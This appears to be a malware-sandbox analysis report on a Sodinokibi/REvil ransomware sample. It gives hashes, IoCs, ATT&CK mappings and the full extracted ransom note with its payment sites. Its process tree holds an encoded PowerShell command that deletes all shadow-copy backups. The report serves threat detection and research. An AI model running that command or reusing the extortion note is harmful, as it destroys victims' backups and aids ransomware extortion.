sodinokibi | d976a41f366fb1e3a0a5d15878d84e24704949973d9e0ccead9a779dee03ef0f

Resubmissions

18-09-2024 11:32

240918-nnmz7azakp 10

15-09-2024 12:50

240915-p21c4svflm 10

15-09-2024 12:44

240915-pysh4atflf 10

15-09-2024 12:04

240915-n83ldatdpl 10

Analysis

max time kernel
117s
max time network
120s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
15-09-2024 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
Size

165KB
MD5

e2708d3c57b562b01da42f9e7549781f
SHA1

3d82951dbfab5629187b26ecb7388b7a05597f67
SHA256

d976a41f366fb1e3a0a5d15878d84e24704949973d9e0ccead9a779dee03ef0f
SHA512

c483968f981e64021025bf4f42424df3cfb88a55bd4cb7f2aa904515eccb85e239c3d44812b28d5b617b6b8476dcc3f4258465a211ae6e6725adbf1850234619
SSDEEP

3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/NaxohzDKMlt:lw02sJPi7O93N3FHlt

Score

10^/10

sodinokibi discovery ransomware

Malware Config

Extracted

Path

C:\Program Files (x86)\u6t0q306re-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. CDHFUND. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension u6t0q306re. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0931195B664ADB5B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/0931195B664ADB5B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: F40vOr52erjLdykID+styObYF3fyBwq7RLtw8EaXzdrf1xosO/BEE5HIBnzM0Jub qyYt03JhU5BHCnfNgxtiKr15e8ykRuxziIUuGbEeVGDWNiNU+js2F60M3on6o1Nx +IncINneDGYFpIIjCYMCYgj90viZoCFi8Q8Gd09DJY5gyMP9spa+frMsD+BzUPue Dy2Ct63ukXEGnkVo87dlhDTsdrvOEFFGXVUbgOMHUbGQ2w3ri3fd212pz+kjAcf3 KbZiXaiVOyS/ZIdTm6wPgKYRFKz4VGnIthGEH7rKeChsXhtDJOm3dWS2moLf/+uk Iu1XRvf35TIa65eKQEOXne/zi2Hu93Cvi+WOI+MlTsLFuvRz6qazKuwgSwi10fAL zcPr3Hxh34Od57zFOZe8ZSPtG8QMvGEgQlYjEILaxlMD2O2/c8FpJMucTl8b1a7R 2sP+1JhrW1M+ex6RT9Lkg6QSLBCP2ERLbaR0dBhQRZGe6XsdKJpr191mafqspVTT wHvKFYgwZB82Zx5/Vde+hjJyqRCVF9lfydZPeGiZsoR2MVkE9ZGdlKevjolnTYYd 9ZaOLBBnWGxwMsbxjQT10pMX+Wnuz4b/FoGM08FLoQ++SpUKlQGICXWbMWDwVRQq qvmWoCWGX0Q3HQlRxWTY4DpQgN7Wc/mDn83hCW5VCfcw0ajk01fsi7g02IQ/MNWB gK81cc31/zNuV/F4VAjt4XeUVTLUTu7xEN9WlO54qnLulVRrDlUmMux7NMUxishR pjDiYGsWcrbYYOu6v644ub2QKwfe9+KRBJ86L2qUqtn2uIMZ5NolBnKLzfXoCyo1 K0KFWgT/pVCUKJopJ6tWMU0aRFp0Z3MK71T/HnE2by+loIML02eBwNoZHyaDj6Fe QeTz/4OrUQ3QmMVMYCzZK0Og7j85xWJCMFx5nnkV8IBwi6YVqTWFXhyHX3ZGMEu7 G6sgeDF3xyR6s5sMCt8eN98W/EbSOPfA3Ur5CIVxBNHy0WdpNnaaYzMPki+Yy+qL 4GmtDhOOtNfgXpNhzc534GcB2OmWecXFZ6HSLXdwSx+Uhj69rjsW4+N5AnteZuyq JLePozjsQ20GTqDGMGF2MPWzGtz1Z+rrV2keSMWWnlTMTotc+9Tti5PW9e7wVXfX HPdg2+JepW6IjHdUQ01zUNcUUcsRblHV1PSVZWqZ5yOyhCx7aKRAKoQgA+bts0xw jizRsntBo0YdotPq9bTTacC0abld1U6BVpc= Extension name: u6t0q306re ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0931195B664ADB5B

http://decryptor.top/0931195B664ADB5B

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\O:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\M:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\W:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\I:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\L:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\S:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\E:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\R:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\Y:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\Z:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\J:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\K:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\N:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\U:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\X:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\D:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\H:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\B:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\T:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\V:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\F:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\A:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\Q:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened (read-only)	\??\G:	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9262.bmp"	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe

Drops file in Program Files directory 32 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\AddAssert.mp2v	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ConvertFromBackup.aif	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ExportLock.kix	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\InitializeGrant.asf	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\PopRead.mpeg3	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CompleteUse.css	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ExitSearch.bmp	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\OutMeasure.mp4v	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RegisterSearch.mp3	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AddConvertTo.pptx	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ConnectOut.pot	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\GrantStart.fon	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\PopLimit.shtml	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ResetClear.vbs	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AddLimit.i64	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\InstallConvert.mov	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UnprotectGet.mht	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ConnectDisable.xlsx	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\OutOptimize.mpp	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ResizeReceive.aif	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UnpublishWait.jfif	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AssertDisable.xml	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ClearTest.vb	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\WaitRequest.iso	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SaveStop.midi	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SuspendConfirm.M2TS	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File created	\??\c:\program files\u6t0q306re-readme.txt	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File created	\??\c:\program files (x86)\u6t0q306re-readme.txt	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\AddDismount.css	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CompareUpdate.wav	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DisconnectMeasure.temp	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
File opened for modification	\??\c:\program files\FormatUse.sql	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133708782950513217"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1156	vlc.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1448	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
1448	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
2168	powershell.exe
2168	powershell.exe
324	chrome.exe
324	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1156	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
324	chrome.exe
324	chrome.exe
324	chrome.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeBackupPrivilege	4252	vssvc.exe
Token: SeRestorePrivilege	4252	vssvc.exe
Token: SeAuditPrivilege	4252	vssvc.exe
Token: SeShutdownPrivilege	324	chrome.exe
Token: SeCreatePagefilePrivilege	324	chrome.exe
Token: SeShutdownPrivilege	324	chrome.exe
Token: SeCreatePagefilePrivilege	324	chrome.exe
Token: SeShutdownPrivilege	324	chrome.exe
Token: SeCreatePagefilePrivilege	324	chrome.exe
Token: SeShutdownPrivilege	324	chrome.exe
Token: SeCreatePagefilePrivilege	324	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
1156	vlc.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe
324	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1156	vlc.exe
1920	OpenWith.exe
312	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 2168	1448	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe	82
PID 1448 wrote to memory of 2168	1448	e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe	82
PID 324 wrote to memory of 3288	324	chrome.exe	94
PID 324 wrote to memory of 3288	324	chrome.exe	94
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 4420	324	chrome.exe	95
PID 324 wrote to memory of 872	324	chrome.exe	96
PID 324 wrote to memory of 872	324	chrome.exe	96
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97
PID 324 wrote to memory of 3988	324	chrome.exe	97

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2168

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3536

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\ResetCompress.mpa"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1156

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1920

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\u6t0q306re-readme.txt
1⤵
PID:2604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffce7b3cc40,0x7ffce7b3cc4c,0x7ffce7b3cc58
  2⤵
  PID:3288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1740 /prefetch:2
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2008,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2196 /prefetch:8
  2⤵
  PID:3988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3728,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4408 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  PID:3728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,226524192884141050,17244279306085102947,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4880 /prefetch:8
  2⤵
  PID:3132

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1704

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\u6t0q306re-readme.txt

Filesize
6KB

MD5
a32acf46cd9ed78405a36a8a721749e9

SHA1
ac4366ea8d045c493b9104ad4f32f3321408bd9a

SHA256
53d5ab0a62c439688a9891476c79729e7c288b4ea3c3b2cf184ff5d115d7fb72

SHA512
f449dc042848609bc0bf1a3c8eb89289ce32652639a48e859891c669edb1c96f71af3602d2e3ff93690b9193db5358987fac7f5b52738f7eedb494e07c8be8b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
f72588362ea07fa7f037ea872cfadda8

SHA1
024d31dbe6809e00b6c8c1a10bf07b0585a2d816

SHA256
c067ea56e6f805bc46f193bee78923575f340b26866bcb4daa5b193ff1c88c9e

SHA512
b67c9412a6294309b740115adefe1f07faac511bed9fd018a4b898d6efd3ec4943e74c787c903ad1109353338ad5eb3c51f2a786c03dbf485207355bea5d3049

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
7ecbfd755b7ef1cd03fbca3d040de5bc

SHA1
b0ed11795a8f84484bba535df37022c3484b1f7b

SHA256
17e91c8f0745ce36d0b56efb844277257a75b55b106b85359d13335da1675606

SHA512
a2e561e9dd84529defb5afa918dfd46d73681db252821af322be2c7db1813f3b17a3800ff0d94480b66c8eedd654d1accc5265d6126003fd348d163693455592

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
